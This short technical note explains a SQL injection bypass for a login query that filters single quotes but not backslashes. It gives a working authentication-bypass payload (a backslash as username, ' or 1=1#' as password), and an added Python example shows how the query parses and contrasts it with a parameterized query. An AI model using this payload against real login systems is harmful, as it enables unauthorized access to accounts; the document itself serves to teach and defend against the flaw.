Single quotes are filtered, but backslashes are not

Query:

select * from users where username='$user' and password='$pass'
Single quotes are filtered out (replaced with an empty string).

Construct a payload to bypass the filter:

?username=\ & password= or 1=1#
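This is equivalent to the following, where the backslash escapes the closing quote of username, so that string runs up to the quote meant to open password and the rest is parsed as SQL: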
select * from users where username='\' and password=' or 1=1#'
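
An added example (Python, not part of the original note): it rebuilds the query with the quote-stripping filter and shows where the string literals end, assuming MySQL's default backslash-escape syntax, next to the parameterized form that removes the problem. The function names, the sample row and the use of sqlite3 for the bound query are assumptions of this example.

```python
import sqlite3

def strip_quotes(value):
    """The page's filter: delete single quotes, leave backslashes alone."""
    return value.replace("'", "")

def build_query(user, password):
    """Vulnerable form: filtered values spliced into the page's query."""
    return ("select * from users where username='%s' and password='%s'"
            % (strip_quotes(user), strip_quotes(password)))

def mysql_skeleton(sql):
    """Replace each string literal with ? the way MySQL's default lexer
    delimits it (backslash escapes the next character, # starts a comment).
    Simplified: ignores doubled '' quotes and other comment styles."""
    out, i, n = [], 0, len(sql)
    while i < n:
        c = sql[i]
        if c == "#":                      # rest of the line is a comment
            break
        if c != "'":
            out.append(c)
            i += 1
            continue
        i += 1                            # step past the opening quote
        while i < n and sql[i] != "'":
            i += 2 if sql[i] == "\\" else 1   # \x is one escaped character
        i += 1                            # step past the closing quote
        out.append("?")
    return "".join(out).strip()

def demo_db():
    """In-memory database with one constructed sample row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (username text, password text)")
    conn.execute("insert into users values ('alice', 's3cret')")
    return conn

def login_parameterized(conn, user, password):
    """Hardened form: values are bound, never spliced into the SQL text."""
    sql = "select * from users where username=? and password=?"
    return conn.execute(sql, (user, password)).fetchall()

if __name__ == "__main__":
    print(mysql_skeleton(build_query("alice", "s3cret")))
    print(mysql_skeleton(build_query("\\", " or 1=1#")))
    print(login_parameterized(demo_db(), "\\", " or 1=1#"))
```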